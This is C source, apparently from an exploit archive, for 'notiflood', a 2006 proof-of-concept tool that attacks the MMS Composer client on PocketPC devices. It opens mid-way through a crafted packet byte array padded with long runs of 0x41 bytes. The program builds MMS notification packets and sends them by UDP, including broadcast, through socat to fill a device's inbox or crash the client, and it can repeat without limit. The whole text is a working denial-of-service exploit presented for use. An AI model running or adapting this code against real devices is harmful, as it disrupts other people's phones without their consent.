0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x00,0x97,0x1f,0x3a,0x83,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0
x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x00,0x96,0x1f,0x35,0x83,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x00,0x83,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0
x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x00};
int mms2_pos[] = { 40, 314, 375, 436, 489 };
char to[100] = {"receiver@receiver.com"};
char from[100] = {"sender@sender.net"};
char subject[100] = {"Your P0ckEtPC just P00PED itself!"};
unsigned int iteration = 0;
void iterate(unsigned char *nty, int *pos)
{
char tmp[57];
char tmp2[57];
sprintf(tmp, "%u%u", time(NULL), iteration);
memset(&nty[pos[0]], '0', 57);
memcpy(&nty[pos[0]], tmp, (strlen(tmp) < 57) ? strlen(tmp) : 56);
sprintf(tmp2, "http://127.0.0.1/?%s",tmp);
memset(&nty[pos[4]], '0', 57);
memcpy(&nty[pos[4]], tmp2, (strlen(tmp2) < 57) ? strlen(tmp2) : 56);
}
void init(unsigned char *nty, int *pos)
{
memset(&nty[pos[1]], ' ', 56);
memcpy(&nty[pos[1]], from, (strlen(from) < 57) ? strlen(from) : 56);
memset(&nty[pos[2]], ' ', 56);
memcpy(&nty[pos[2]], to, (strlen(to) < 57) ? strlen(to) : 56);
memset(&nty[pos[3]], ' ', 56);
memcpy(&nty[pos[3]], subject, (strlen(subject) < 57) ? strlen(subject) : 56);
}
void usage()
{
printf(""\
"notiflood - proof-of-concept PocketPC MMS Composer m-notification.ind flooder\n\n"\
" (c) 2006 Collin Mulliner <collin@trifinite.org>\n"\
" http://www.mulliner.org/pocketpc/ | http://www.trifinite.org\n\n"\
" for educational purposes only, please use responsible!\n\n"\
"options:\n"\
"\t-d destination ip (broadcast works!)\n"\
"\t-i interval (useconds)\n"\
"\t-n number of packets (0=unlimited)\n"\
"\t-s subject\n"\
"\t-f from\n"\
"\t-t to\n"\
"\t-c crash client\n"\
"\t-F flip-flop between crash / start client\n"\
"\t-h help\n"\
"\t-q quiet\n\n");
}
int main(int argc, char **argv)
{
int f, i, l = 0;
char system_cmd[200];
int mode = 0; // 0 = flood , 1 = crash , 2 = flip-flop
int opt;
char dest[20] = {0};
int interval = 500000;
unsigned int num = 0;
int verbose = 1;
int flipflop = 0;
while ((opt = getopt(argc, argv, "i:n:d:s:t:f:cqhF")) != EOF) {
switch (opt) {
case 'd':
strncpy(dest, optarg, 19);
break;
case 's':
strncpy(subject, optarg, 56);
break;
case 't':
strncpy(to, optarg, 56);
break;
case 'f':
strncpy(from, optarg, 56);
break;
case 'c':
mode = 1;
break;
case 'F':
mode = 2;
break;
case 'n':
num = atoi(optarg);
break;
case 'i':
interval = atoi(optarg);
break;
case 'q':
verbose = 0;
break;
default:
case 'h':
usage();
break;
}
}
if (optind < argc) {
usage();
exit(-1);
}
if (strlen(dest) == 0) {
usage();
exit(-1);
}
sprintf(system_cmd, "cat mmsflood.fld|socat udp4:%s:2948,broadcast stdin &", dest);
init(mms1, mms1_pos);
init(mms2, mms2_pos);
if (verbose) {
printf("to: %s\n", to);
printf("from: %s\n", from);
printf("subject: %s\n", subject);
printf("dst-ip: %s\n", dest);
if (mode == 1) printf("crash client\n");
else if (mode == 0) printf("fillup client inbox\n");
else printf("flip-flop mode\n");
printf("flood interval: %d seconds\n", interval);
printf("number of packets: %d (0=unlimited)\n", num);
}
if (mode == 2) {
flipflop = 1;
}
do {
iteration++;
f = open("mmsflood.fld", O_CREAT|O_RDWR|O_TRUNC, 00666);
if (mode == 0) { // flood
iterate(mms1, mms1_pos);
write(f, mms1, sizeof(mms1));
}
else if (mode == 1) { // crash
iterate(mms2, mms2_pos);
write(f, mms2, sizeof(mms2));
}
close(f);
system(system_cmd);
if (flipflop == 1) {
if (mode == 0) mode = 1;
else mode = 0;
}
if (interval > 0) usleep(interval);
} while ((iteration < num && num != 0) || num == 0);
return(0);
}
// milw0rm.com [2006-08-09]